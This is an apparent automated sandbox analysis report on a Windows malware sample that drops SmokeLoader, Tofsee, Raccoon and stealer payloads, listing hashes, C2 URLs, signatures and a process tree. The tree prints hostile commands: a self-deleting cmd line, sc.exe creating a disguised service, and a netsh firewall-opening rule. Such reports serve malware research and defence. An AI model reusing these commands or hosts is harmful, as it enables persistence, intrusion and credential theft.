Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-01-2022 23:51
Static task
static1
Behavioral task
behavioral1
Sample
d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe
Resource
win10-en-20211208
General
-
Target
d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe
-
Size
289KB
-
MD5
97e1240d0a01ba60bb228edb457345c8
-
SHA1
626a05ca6a6265dd11ed5ce43b81d01cfac1318b
-
SHA256
d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb
-
SHA512
bd69f329d650565848735687b9adb1dcc5bc09089c9c9d9899781d1d99a9a2220dc43162cf019db87ce67704c325bb3acbd2beec8ceb3db7e58d765b759e28f9
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
Panda Stealer Payload 3 IoCs
resource yara_rule behavioral1/memory/1296-335-0x0000000000DB0000-0x0000000000EBF000-memory.dmp family_pandastealer behavioral1/memory/1296-339-0x0000000000DB0000-0x0000000000EBF000-memory.dmp family_pandastealer behavioral1/memory/1296-340-0x0000000000DB0000-0x0000000000EBF000-memory.dmp family_pandastealer -
PandaStealer
Panda Stealer is a fork of CollectorProject Stealer written in C++.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 1804 created 720 1804 WerFault.exe 100 -
Arkei Stealer Payload 5 IoCs
resource yara_rule behavioral1/memory/3248-140-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral1/memory/600-216-0x0000000000850000-0x0000000000C0F000-memory.dmp family_arkei behavioral1/memory/600-217-0x0000000000850000-0x0000000000C0F000-memory.dmp family_arkei behavioral1/memory/600-218-0x0000000000850000-0x0000000000C0F000-memory.dmp family_arkei behavioral1/memory/600-219-0x0000000000850000-0x0000000000C0F000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/624-289-0x00000000003E0000-0x000000000083B000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 145 2116 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
pid Process 1208 7F4E.exe 1556 91EC.exe 3188 91EC.exe 3248 A8F0.exe 1668 B5E1.exe 1292 BF58.exe 1852 zxawemat.exe 1880 BF58.exe 600 30A1.exe 720 4B4E.exe 3052 7DD9.exe 1292 extd.exe 2200 extd.exe 2168 setup1.exe 3572 extd.exe 1976 setup2.exe 528 extd.exe 3832 8F10.exe 624 setup3.exe 3324 extd.exe 1712 ABF0.exe 1296 B538.exe 364 CB9F.exe 2924 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000500000001ab83-239.dat upx behavioral1/files/0x000500000001ab83-240.dat upx behavioral1/files/0x000500000001ab83-244.dat upx behavioral1/files/0x000500000001ab83-253.dat upx behavioral1/files/0x000500000001ab83-262.dat upx behavioral1/files/0x000500000001ab83-302.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30A1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30A1.exe -
Deletes itself 1 IoCs
pid Process 2896 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 6 IoCs
pid Process 3248 A8F0.exe 3248 A8F0.exe 3248 A8F0.exe 600 30A1.exe 600 30A1.exe 600 30A1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 30A1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 600 30A1.exe 600 30A1.exe 1976 setup2.exe 624 setup3.exe 1296 B538.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1016 set thread context of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1556 set thread context of 3188 1556 91EC.exe 72 PID 1852 set thread context of 788 1852 zxawemat.exe 92 PID 1292 set thread context of 1880 1292 BF58.exe 89 PID 2168 set thread context of 2368 2168 setup1.exe 119 PID 3832 set thread context of 3900 3832 8F10.exe 120 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 1804 720 WerFault.exe 100 3220 1712 WerFault.exe 121 600 364 WerFault.exe 124 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7F4E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7F4E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7F4E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString A8F0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 30A1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 30A1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 A8F0.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2352 timeout.exe 652 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e RegAsm.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1448 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 1448 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2896 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1448 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 1208 7F4E.exe 2896 Process not Found 2896 Process not Found 2896 Process not Found 2896 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeDebugPrivilege 1292 BF58.exe Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeDebugPrivilege 1880 BF58.exe Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeRestorePrivilege 1804 WerFault.exe Token: SeBackupPrivilege 1804 WerFault.exe Token: SeDebugPrivilege 1804 WerFault.exe Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found Token: SeCreatePagefilePrivilege 2896 Process not Found Token: SeShutdownPrivilege 2896 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 1016 wrote to memory of 1448 1016 d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe 69 PID 2896 wrote to memory of 1208 2896 Process not Found 70 PID 2896 wrote to memory of 1208 2896 Process not Found 70 PID 2896 wrote to memory of 1208 2896 Process not Found 70 PID 2896 wrote to memory of 1556 2896 Process not Found 71 PID 2896 wrote to memory of 1556 2896 Process not Found 71 PID 2896 wrote to memory of 1556 2896 Process not Found 71 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 1556 wrote to memory of 3188 1556 91EC.exe 72 PID 2896 wrote to memory of 3248 2896 Process not Found 73 PID 2896 wrote to memory of 3248 2896 Process not Found 73 PID 2896 wrote to memory of 3248 2896 Process not Found 73 PID 2896 wrote to memory of 1668 2896 Process not Found 74 PID 2896 wrote to memory of 1668 2896 Process not Found 74 PID 2896 wrote to memory of 1668 2896 Process not Found 74 PID 2896 wrote to memory of 1292 2896 Process not Found 75 PID 2896 wrote to memory of 1292 2896 Process not Found 75 PID 2896 wrote to memory of 1292 2896 Process not Found 75 PID 1668 wrote to memory of 564 1668 B5E1.exe 76 PID 1668 wrote to memory of 564 1668 B5E1.exe 76 PID 1668 wrote to memory of 564 1668 B5E1.exe 76 PID 1668 wrote to memory of 724 1668 B5E1.exe 78 PID 1668 wrote to memory of 724 1668 B5E1.exe 78 PID 1668 wrote to memory of 724 1668 B5E1.exe 78 PID 1668 wrote to memory of 3040 1668 B5E1.exe 80 PID 1668 wrote to memory of 3040 1668 B5E1.exe 80 PID 1668 wrote to memory of 3040 1668 B5E1.exe 80 PID 1668 wrote to memory of 3988 1668 B5E1.exe 82 PID 1668 wrote to memory of 3988 1668 B5E1.exe 82 PID 1668 wrote to memory of 3988 1668 B5E1.exe 82 PID 1668 wrote to memory of 3160 1668 B5E1.exe 85 PID 1668 wrote to memory of 3160 1668 B5E1.exe 85 PID 1668 wrote to memory of 3160 1668 B5E1.exe 85 PID 1668 wrote to memory of 1720 1668 B5E1.exe 90 PID 1668 wrote to memory of 1720 1668 B5E1.exe 90 PID 1668 wrote to memory of 1720 1668 B5E1.exe 90 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1852 wrote to memory of 788 1852 zxawemat.exe 92 PID 1852 wrote to memory of 788 1852 zxawemat.exe 92 PID 1852 wrote to memory of 788 1852 zxawemat.exe 92 PID 1852 wrote to memory of 788 1852 zxawemat.exe 92 PID 1852 wrote to memory of 788 1852 zxawemat.exe 92 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 1292 wrote to memory of 1880 1292 BF58.exe 89 PID 3248 wrote to memory of 1408 3248 A8F0.exe 94 PID 3248 wrote to memory of 1408 3248 A8F0.exe 94 PID 3248 wrote to memory of 1408 3248 A8F0.exe 94 PID 2896 wrote to memory of 1836 2896 Process not Found 96 PID 2896 wrote to memory of 1836 2896 Process not Found 96 PID 2896 wrote to memory of 1836 2896 Process not Found 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe"C:\Users\Admin\AppData\Local\Temp\d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe"C:\Users\Admin\AppData\Local\Temp\d6cccb02b8f63c34eb32d50c153601202b20e315ecbb9e2a538acab1dfd768fb.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\7F4E.exeC:\Users\Admin\AppData\Local\Temp\7F4E.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1208
-
C:\Users\Admin\AppData\Local\Temp\91EC.exeC:\Users\Admin\AppData\Local\Temp\91EC.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\91EC.exeC:\Users\Admin\AppData\Local\Temp\91EC.exe2⤵
- Executes dropped EXE
PID:3188
-
-
C:\Users\Admin\AppData\Local\Temp\A8F0.exeC:\Users\Admin\AppData\Local\Temp\A8F0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A8F0.exe" & exit2⤵PID:1408
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2352
-
-
-
C:\Users\Admin\AppData\Local\Temp\B5E1.exeC:\Users\Admin\AppData\Local\Temp\B5E1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pjuzoiqi\2⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zxawemat.exe" C:\Windows\SysWOW64\pjuzoiqi\2⤵PID:724
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create pjuzoiqi binPath= "C:\Windows\SysWOW64\pjuzoiqi\zxawemat.exe /d\"C:\Users\Admin\AppData\Local\Temp\B5E1.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3040
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description pjuzoiqi "wifi internet conection"2⤵PID:3988
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start pjuzoiqi2⤵PID:3160
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\BF58.exeC:\Users\Admin\AppData\Local\Temp\BF58.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\BF58.exeC:\Users\Admin\AppData\Local\Temp\BF58.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\SysWOW64\pjuzoiqi\zxawemat.exeC:\Windows\SysWOW64\pjuzoiqi\zxawemat.exe /d"C:\Users\Admin\AppData\Local\Temp\B5E1.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:788
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
